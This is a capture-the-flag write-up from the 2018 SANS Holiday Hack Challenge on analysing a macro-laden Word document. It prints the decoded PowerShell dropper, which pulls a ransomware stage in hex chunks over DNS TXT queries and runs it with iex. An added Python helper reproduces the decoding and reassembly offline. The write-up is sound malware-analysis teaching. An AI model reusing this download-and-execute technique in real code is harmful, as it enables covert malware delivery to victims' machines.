March 14, 2019

Identify the Domain

Main Challenge @ The 2018 SANS Holiday Hack Challenge [ Kringlecon ]

CTF Writeup


Hey, you’re pretty good at this security stuff. Could you help me further with what I suspect is a malicious Word document?

All the elves were emailed a cookie recipe right before all the infections. Take this document with a password of elves and find the domain it communicates with.


Dropper Download

Word docm macros can be extracted using olevba.

Perhaps we can use this to grab the ransomware source.


1- Recommended viewing: Chris Davis's talk on Analyzing PowerShell Malware:

2- Download the malicious Word document :

Alert ! Alert ! Alert !


3- You can get a ready-made Windows virtual machine from here:

or from here

4- Run the virtual machine and copy zipped malware file to it.

5- Unzip the file with password elves

6- You will get the malicious Word document CHOCOLATE_CHIP_COOKIE_RECIPE.docm

7- Make sure you have Python 2.7 installed so you can run the analysis tools:

How to install tutorial :

8- Make sure you have Visual Studio Code installed; it makes reading and editing PowerShell scripts easier:

9- Start PowerShell from the Windows menu

10- Install the olevba tool: since we are using a Windows 10 VM for this analysis, run the following command in the VM terminal:

pip install -U oletools

You can refer to the olevba wiki for more details

11- Let's extract the macro from the malware using olevba:

  • Change directory to where you put the malware file, then check with dir:


  • Run olevba to extract the macros from the malware file


  • This is the malicious PowerShell code carried by the macro:


  • We can either run the command itself or use an online tool to base64-decode and then inflate it into readable text:

Method 1:

Let's run the command, but first we need to modify it. Remove the following:
Then add | Out-File source-1.ps1 at the end to save the result to a file. The PowerShell code will be:


Type this code in the terminal and run it, then check for the file source-1.ps1 with the ls command.


Let's look at source-1.ps1: type .\source-1.ps1


Method 2:
Using the online converter CyberChef: copy the base64 code into the input field, then select the From Base64 operation followed by the Raw Inflate operation:


Copy the result into a new file in Visual Studio Code and save it as source-1.ps1

12- As you can see from both methods, the decoded stage retrieves more PowerShell script to run:
function H2A($a) {$o; $a -split '(..)' | ? { $_ } | forEach {[char]([convert]::toint16($_,16))} | forEach {$o = $o + $_}; return $o}; $f = "77616E6E61636F6F6B69652E6D696E2E707331"; $h = ""; foreach ($i in 0..([convert]::ToInt32((Resolve-DnsName -Server -Name "$" -Type TXT).strings, 10)-1)) {$h += (Resolve-DnsName -Server -Name "$i.$" -Type TXT).strings}; iex($(H2A $h | Out-string))

It communicates with that domain over DNS TXT queries to download the PowerShell script named by the hex string 77616E6E61636F6F6B69652E6D696E2E707331, which we decoded before to wannacookie.min.ps1.
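To make the two decoding steps above reproducible offline, here is an added analysis helper (example code written for this writeup, not part of the original post or of the challenge files). It re-implements the base64 plus raw-inflate unpacking of Method 1/2, ports the dropper's H2A hex-to-text routine, and models the DNS TXT fetch loop against a constructed, in-memory "resolver" so that no real DNS lookups happen. The second-stage script it packs is a harmless constructed stand-in, not the real wannacookie code, and the resolver table is likewise constructed; only the hex string 77616E6E61636F6F6B69652E6D696E2E707331 is taken from the page.

```python
import base64
import re
import zlib

# Hex string recovered from the dropper on the page; decodes to wannacookie.min.ps1
NAME_HEX = "77616E6E61636F6F6B69652E6D696E2E707331"

# Constructed stand-in for the second stage (NOT the real malware): a harmless
# line that carries a hex-encoded filename the way the real stage does.
STAGE2_SAMPLE = 'Write-Host "stage 2"; $f = "%s"' % NAME_HEX


def make_sample_blob(script: str) -> str:
    """Pack a script as base64(raw-deflate(script)), the shape the macro's
    one-liner hands to iex, so decode_dropper() has realistic input."""
    comp = zlib.compressobj(level=9, wbits=-15)  # wbits<0 => raw DEFLATE, no zlib header
    data = comp.compress(script.encode("utf-8")) + comp.flush()
    return base64.b64encode(data).decode("ascii")


def decode_dropper(blob: str) -> str:
    """Same transform as PowerShell's FromBase64String + DeflateStream(Decompress),
    i.e. CyberChef 'From Base64' followed by 'Raw Inflate'."""
    raw = base64.b64decode(blob)
    return zlib.decompress(raw, wbits=-15).decode("utf-8")


def h2a(hexstr: str) -> str:
    """Port of the dropper's H2A: every two hex characters become one character."""
    return "".join(chr(int(hexstr[i:i + 2], 16)) for i in range(0, len(hexstr), 2))


# Quoted runs of at least 4 hex byte-pairs are worth decoding when triaging a stage.
HEX_LITERAL = re.compile(r'"((?:[0-9A-Fa-f]{2}){4,})"')


def find_hex_strings(script: str) -> list:
    """Decode every quoted hex literal in a recovered script (filenames, domains...)."""
    return [h2a(m) for m in HEX_LITERAL.findall(script)]


def reassemble_from_txt(hexname: str, resolve_txt) -> str:
    """Mirror the dropper's fetch loop: TXT for "<hex>" holds the chunk count,
    TXT for "<i>.<hex>" holds chunk i; the hex chunks are joined and run through H2A.
    resolve_txt(name) -> str stands in for (Resolve-DnsName ... -Type TXT).strings."""
    count = int(resolve_txt(hexname), 10)
    joined = "".join(resolve_txt("%d.%s" % (i, hexname)) for i in range(count))
    return h2a(joined)


def constructed_resolver(hexname: str, payload: str, chunk_size: int = 16):
    """Build an offline TXT 'zone' (constructed, no network) that serves `payload`
    the way the dropper expects it: a count record plus numbered hex chunks."""
    hexpayload = payload.encode("utf-8").hex().upper()
    chunks = [hexpayload[i:i + chunk_size] for i in range(0, len(hexpayload), chunk_size)]
    table = {hexname: str(len(chunks))}
    table.update({"%d.%s" % (i, c_name): chunk for i, (c_name, chunk) in
                  enumerate((hexname, c) for c in chunks)})

    def lookup(name: str) -> str:
        return table[name]

    return lookup


if __name__ == "__main__":
    blob = make_sample_blob(STAGE2_SAMPLE)
    stage2 = decode_dropper(blob)
    print("decoded stage 2:", stage2)
    print("hex literals   :", find_hex_strings(stage2))
    resolver = constructed_resolver(NAME_HEX, "Write-Host 'fetched over TXT'")
    print("TXT reassembly :", reassemble_from_txt(NAME_HEX, resolver))
```

For triage, the useful part is the shape of the traffic the loop produces: one TXT query for the hex name followed by a numbered burst `0.<hex>`, `1.<hex>`, ... against the same server, which is what you would look for in DNS logs from the infected hosts.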

📟 Go to your Badge > Objectives > Enter
